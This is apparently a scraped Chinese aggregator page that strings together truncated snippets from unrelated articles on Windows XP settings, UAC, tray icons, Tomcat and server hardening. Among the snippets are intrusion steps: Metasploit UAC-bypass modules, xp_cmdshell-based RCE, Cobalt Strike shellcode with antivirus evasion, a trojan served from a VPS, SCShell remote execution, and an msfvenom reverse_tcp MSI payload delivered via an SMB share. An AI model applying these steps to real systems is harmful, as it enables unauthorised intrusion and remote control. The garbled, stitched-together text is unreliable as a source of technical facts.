其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果 需要UAC的授权才能进行的操作列表如下: 配置Windows Update 增加...: 始终通知:这是最严格的设置,每当有程序需要使用高级别的权限时都会提示本地用户 仅在程序试图更改我的计算机时通知我:这是UAC的默认设置。...但是,当第三方程序要使用高级别的权限时,会提示本地用户 仅在程序试图更改我的计算机时通知我(不降低桌面的亮度):与上一条设置的要求相同,但在提示用户时不降低桌面的亮度 从不提示:当用户为系统管理员时,所有程序都会以最高权限运行...1.方法一:Windows权限升级绕过UAC保护 此模块将通过进程注入使用可信任发布者证书绕过Windows UAC。它将生成关闭UAC标志的第二个shell。...2.方法二:Windows权限提升绕过UAC保护(内存注入) 此模块将通过进程注入使用可信任的发布者证书绕过Windows UAC。它将生成关闭UAC标志的第二个shell。
24、音乐目录图片随意设 Windows XP在以往的Windows操作系统之上提供了很多更高级的管理功能,其中包括图片册生成器,该图片册生成器可以将唱片封面图片自动放置到用户对应保存的音乐文件夹内...26、清除共享文件夹 Windows XP操作系统一个比较不友好的用户界面是在“我的电脑”窗口上半部分显示所有共享的文件夹,如果用户设置的共享文件夹较多,每当打开“我的电脑”窗口时,就会列有很多共享文件夹信息...里也应该要先设为支援DMA) 3、XP里关闭光驱自启动(Autorun)功能:打开:我的电脑,在“移动存储设备”下,右键单击CD-ROM 驱动器,然后单击“属性”,看到“自动播放”选项卡了么?...5、xp内置了防火墙,默认设置是未打开。设置方法详见后面的“全面设置防火墙”。 四、XP系统所在分区减肥方法。 1....”设置窗口”中选择”首选项”的”语言栏”,关闭“在桌面上显示语言栏”,在第三项”在通知区域显示其他语言栏图标”复选框上打上勾。
[TOC] 1.服务器 0x00 微软杀毒软件停止/启用 由于windows Defender的MsMpSvc Microsoft Antimalware Service 的进程内存使用率高(一般是在服务器上...方法二:在右侧双击打开“关闭windows Defender”; 更新策略:gpupdate /force 0x01 服务器补丁 Windows Vista Service Pack 2(SP2-操作系统...建议您参考下面的文章中的工具进行系统文件修复,看看问题是否解决: #Error 0x800B0100 when you try to install Windows Updates or Microsoft...WeiyiGeek.XP注册表封闭 (2)关闭U盘自动弹出与禁止优盘自动打开 计算机为了防止移动设备通过usb接口感染病毒,我们会在计算机系统中关闭自启动功能,虽然防止了u盘携带的病毒传入计算机,但这样的方法所带来的问题是插入...非管理员账号未设置密码,未设置密码策略 建议设置: 增强口令策略16位大小写字母、Win7设置匿名共享但不让其(Guest)登录,使用Win+R键调出运行,输入secpol.msc->安全设置, 右键“我的电脑
“我认为人们开始将通知区域叫作系统托盘是因为在Windows95中包含了一个systray.exe的程序,这个程序在通知区域中显示了一些图标,如音量控制,PCMCIA(在当时是叫这个名字)的状态、电池的电量表等...“这个进程还活着”;而且在无界面展现时,让用户方便唤起界面或者执行相应的功能。...图标从通知区域剔除 相应的,如果进程退出,应该通知系统通知区域:要将我设置的通知区域图标删除,因为我马上要退出了。...非常庆幸,XP下只有这么一个通知区域,而且这个通知区域一直是可见的(Win7下有个不可见的通知区域)。 ...} while ( dwMaxLoopCount > 0 ); } 鉴于XP的通知区域的结构简单性,我决定先从XP系统入手。
未授权访问+数据查询+xp_cmdshell=RCE 在getshell之后,并未停止测试脚步,发现了一处sql查询页面,除了可以查询数据库内容外,还可以执行sql语句。...; 这里直接将开启xp_cmdshell的sql语句执行,未报错。...再生成可执行文件木马上传,直接上传失败,那几乎可以确定了存在杀软,其实在执行这些之前应该先查询杀软是否存在,此处不该莽撞。...查询 通过webshell执行tasklist命令列出进程列表,查看进程信息。 这里将进程信息放进潇湘老哥的杀软查询工具中快速对比,获知主机开启了360和安全狗。...免杀 对我而言,免杀只能找到github上的大佬工具来用了,在Cobalt Strike中生成shellcode并通过一个目前可用的免杀工具生成木马,在vps用python -m http.server
在Windows XP中查看计算机开关机记录 在Windows XP中,我们可以通过“事件查看器”的事件日志服务查看计算机的开、关机时间。...询的扩展名。 2.如何定制相关联的自动运行(Windows XP) 在Windows XP中,有一些文件类型和程序关联得非常紧密,这些文件包括图片、视频或者音频文件等。...3.双击可执行文件(.exe)后提示没有相关联的程序 Windows 2000/XP:双击“我的电脑”打开“资源管理器”,点击“工具→文件夹选项”,点击“文件类型”选项卡,然后点击“新建”按钮,在文件扩展名处输入...强行关闭WinXP系统一法 我们在关闭计算机的时候,如果有程序未退出,则系统会弹出对话框,提醒某个程序仍在运行,是否结束任务。...messenger的文件传输采用TCP6891-6900端口,可以在xp的防火墙设置里面增加TCP6891号端口,文件就可以顺利发送了。文件传输的进程,一般情况下我们添加一个就行了。
“我的电脑”,点击属性,点击“自动更新”,在“通知设置”一栏选择“关闭自动更新。...关闭自动更新具体操作为:右键单击“我的电脑/属性/自动更新”,在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。 ...关闭“自动发送错误报告”功能 大家在Window XP 中肯定有这样的经历,一旦一个程序异常终止,系统就会自动跳出一个对话框问你是否将错误发送给微软,这就是XP中的“自动发送错误”功能,它可以将错误信息发送到微软的网站...Windows XP现在已经相当普及了,在使用它的过程中,你是否感觉在速度上很多地方还没有Windows 9x系统快呢?比如访问网上邻居、开机关机等,下面我们就来逐个提升它们的速度。...3.你的XP是否已激活(太老了,让新手看一下吧:)) 开始—运行,输入 oobe/msoobe /a 确定 会出现Windows 产品是否已激活的提示。 3.我的XP是什么版本?
,其目的不是确定程序是否是恶意软件,而是在没有用户许可下对恶意软件的未授权行为进行掌控。...#此模块将通过进程注入使用可信任发布者证书绕过Windows UAC,它将生成关闭UAC标志的第二个shell。...exploit/windows/local/bypassuac_injection #此模块将通过进程注入使用可信任的发布者证书绕过Windows UAC。它将生成关闭UAC标志的第二个shell。...它将生成关闭UAC标志的第二个shell。此模块修改注册表项,但在调用payload后将清除该项。该模块不需要payload的体系架构和操作系统匹配。...它将生成关闭UAC标志的第二个shell。此模块修改注册表项,但在调用payload后将清除该项。该模块不需要payload的体系架构和操作系统匹配。
而Windows XP和Windows Server2003及其之前的机器都是用的SMB1.0协议。...使用它不仅可以获得其它电脑IE浏览器的信息,而且还可以对浏览器进行操作。...RPC 提供了一种进程间的通信机制,通过这一机制,允许在某台计算机上运行的程序流畅地在远程系统上执行代码。...当收到浏览列表显示请求时,收到请求的主浏览器会发送浏览列表给请求的主机。关闭电脑时,主机会通知主浏览器,以便让主浏览器将自己的NetBIOS名从列表中删除掉。...在Windows 95中,NetBIOS是在默认条件下安装的。在更高的Windows版本中,如果选择也可以安装。所以不仅要停止NBT,还应该确认NetBEUI是否在起作用。
前段时间借助开源项目 EasyHook 制作了一个在应用层下的监控进程创建的工具。...这些问题最终让我向内核研究,希望可以通过一份代码,编译出适应不同系统的驱动程序实现我们的需求,所以就有了本文的内容,我们先来看一下效果图。...与应用层不同的是,驱动不仅可以监控进程的创建,还可以监控进程的退出。这全部是 Windows 系统给我们提供的功能。...由于我们编译使用的是 WDK10,已经不支持 XP 了,若想在 XP 下实现如上功能,可以参考进程创建通知回调例程学习笔记。...,使用 VS2015 编译会生成 ProcessMonitor.sys 驱动文件。
Tomcat 重启脚本,送给有需要的 JSP 环境运维同行们~ 运行环境:XP/windows 2003 测试通过,其他环境由于手头上条件限制未测试; 脚本功能:在常规调用 tomcat 自带的关闭/重启脚本中加入假死判断...,若出现假死则予以强行 Kill 掉相关 JAVA 进程; 脚本特点:可在 tomcat/Jboss/apache 混合平台使用,针对性的只重启 tomcat 相关进程; 注意事项:就是注意 tomcat...环境变量是否正确即可。
大家好,又见面了,我是你们的朋友全栈君。 werfault进程是Windows vista 错误报告进程,是用来向微软反馈报告。是安全的正常进程。...3.接下来的“对于所有用户和应用程序,问题报告被设置为 ”,点击右边个“更改设置”。 4.在弹出窗口,选择“关闭”。...补充: xp系统下禁用错误报告简单方法: 1.我的电脑”–”属性”–”高级”–点”错误报告”, 2.选择”禁用错误汇报”,勾选“但在发生严重错误时通知我”—确定。
一、Windows Server2003的安装 1、安装系统最少两需要个分区,分区格式都采用NTFS格式 2、在断开网络的情况安装好2003系统 3、安装IIS,仅安装必要的 IIS 组件...,选择计算机配置-Windows设置-安全设置-审核策略在创建审核项目时需要注意的是如果审核的项目太多,生成的事件也就越多,那么要想发现严重的事件也越难当然如果审核的太少也会影响你发现严重的事件,你需要根据情况在这二者之间做出选择...注:3-6项内容我采用的是Server2000设置,没有测试过对2003是否起作用。但有一点可以肯定我用了一段的时间没有发现其它副面的影响。...十、运行服务器记录当前的程序和开放的端口 1、将当前服务器的进程抓图或记录下来,将其保存,方便以后对照查看是否有不明的程序。 ...2、将当前开放的端口抓图或记录下来,保存,方便以后对照查看是否开放了不明的端口。当然如果你能分辨每一个进程,和端口这一步可以省略。
)Windows XP Professional 上的 IIS Windows 二.关于wswp的一些知识。...Q : 如何启动和关闭W3WP.EXE这个进程 A : W3WP.EXE这个进程将在你访问www应用程序的时候启动.有人就会这么问了:"我启动了一个Web应用程序,发现系统自动创建了一个W3wp.exe...Q : w3wp.exe在进程中存在的原因 A : IIS 6.0版本中的w3wp.exe进程是会根据INTER信息的开放与否而决定是否存在,只要IIS提供WEB服务,该进程会始终存在,无论是否支持asp...由于多个运行并存,因而当该进程占用CPU利用率达到手工设置的饱和数值时(如70%),执行操作为"关闭"即可,不会对提供WEB服务有任何影响。...什么是Web园 在您创建应用程序池时,就会通知 IIS 6 创建一个工作进程,以传送指派给该应用程序池的 Web 站点、文件和文件夹的内容。
整理电脑的时候找到自已以前分析的一个鬼影病毒的资料,当时兼容市面上主要的windows系统(XP, win7,包含x86和x64系统)样本来自国外,有不少亮点,当时花了不少时间把所有原理分析出来并重新用汇编和...木马执行流程从MBR开始,通过hook和注册回调函数的机制,将所有的木马程序在windows启动过程中逐级得到执行, windows启动完毕后最终将下载者dll注入到指定的系统进程中,下载者代码循环执行而告终...木马亮点有: 绕过windows的PatchGuard保护 兼容XP, win7(x86,x64)(bootkit型底层木马兼容不同系统是挺有挑战的) 自保护功能:感染木马后通过WinHex等工具查看到的...钩子函数 a)确认写入的数据是否在MBR处或磁盘末尾0xFC00处 b)当向MBR写入数据时:将写入的数据保存到上表内存中0×400处(假MBR),以及更新0×200(原始MBR)和0×600(染后后MBR...0xFC00写入数据时:计算写入数据与末尾0xFC00的交叉情况,保存写入的数据到0×10400处(假的磁盘末尾数据) (2)NtReadFile钩子函数 a)确认读取的数据是否在MBR处或磁盘末尾0xFC00
Windows7下“僵尸”图标的解决方案 从《一种清除windows通知区域“僵尸”图标的方案——问题分析》(以后简称《问题分析》)一文中分析的通知区域结构可以看出,Windows7的通知区域比...虽然我们可以在“控制面板\所有控制面板项\通知区域图标”下选择“始终在任务栏上显示所有图标和通知(A)”,来让Windows7的通知区域和XP上一致,但是我们无法让用户这么去做,因为我们给不出这样做的必要...这个隐藏的通知区域是让我非常头疼的,《一种清除windows通知区域“僵尸”图标的方案——XP系统解决方案》一文中的所有方案都不适用于它。 ...在各种方法走不通的情况下,我们不妨换一种思路:保证只有一个图标。如果进程意外退出,那么在下次启动时,再次注册和新增通知区域图标时,我们先删掉原来的图标然后再新增图标,而不是简单的新增一个图标。...或许有人会问,为什么XP下不这么做呢?因为XP下无法删除其他进程创建的图标。 XP下密集出现的“僵尸”图标问题,应该是引起了微软的注意。
然后我们就可以获得一个dll ②通过SCShell在远程主机上执行生成的Payload,命令如下: SCShell.exe 10.10.10.19 XblAuthManager "C:\Windows...该命令提供了一个切换用户会话的功能。在正常情况下,切换会话时需要提供目标用户的登录密码,但在SYSTEM权限下能够完全绕过验证,不输入密码即可切换到目标用户的会话,从而实现未授权登录。...目前有两种常见的利用方法: 一是通过调用WMI的类方法进行远程执行,如Win32 Process类中的Create方法可以在远程主机上创建进程,Win32 Product类中的Install方法可以在远程主机上安装恶意的...4444 -f msi -o reverse_tcp.msi ③在一台测试人员可控的服务器上搭建SMB共享服务器,并将生成的MSI文件放入共享目录 mkdir /root/share python smbserver.py...适用:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows
查看是否有CPU和内存占用过高等异常情况。 2.检查当前进程情况 切换“任务管理器”到进程,查找有无可疑的应用程序或后台进程在运行。...用进程管理器查看进程时里面会有一项taskmgr,这个是进程管理器自身的进程。如果正在运行windows更新会有一项wuauclt.exe进程。...,查看组选项,查看administrators组是否添加有新帐号,检查是否有克隆帐号。 ...4.查看当前端口开放情况 使用activeport,查看当前的端口连接情况,尤其是注意与外部连接着的端口情况,看是否有未经允许的端口与外界在通信。...如采用实地处理,在发现入侵的第一时间通知机房关闭服务器,待处理人员赶到机房时断开网线,再进入系统进行检查。
image.png 也可以右键点击我的电脑,菜单中点击属性,在弹出的窗口里点高级,再点下方红圈中的设置,在弹出的系统启动窗口中点击编辑。同样可以打开boot文件。...成功设置xp支持4g内存 作者:死者代言人日期:2008-01-26 字体大小:小中大 近日在网上研究让xp支持4g内存,总结他人经验,反复尝试,终于成功,方法如下: 1,首先检查主板是否支持,下载everest...” 这样保存关闭,系统就打开了PAE 我的是xp sp2系统,其他系统没有测试,大家不要乱来 这样,重新启动后,电脑属性的下方多了“物理地址扩展”几个字,虽然显示的还是3.25g内存,但实际上4g内存已经完全启用了..., Datacenter Edition" /3GB /PAE 我们知道32位windows对于每个进程都分配4GB内存(虚拟内存),其中起始的2GB归windows核心使用,剩余的归应用程序本身使用。...(1)\WINDOWS="Microsoft Windows XP Professional" /PAE /noexecute=optin /fastdetect” 这样保存关闭,系统就打开了PAE 重新启动后
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
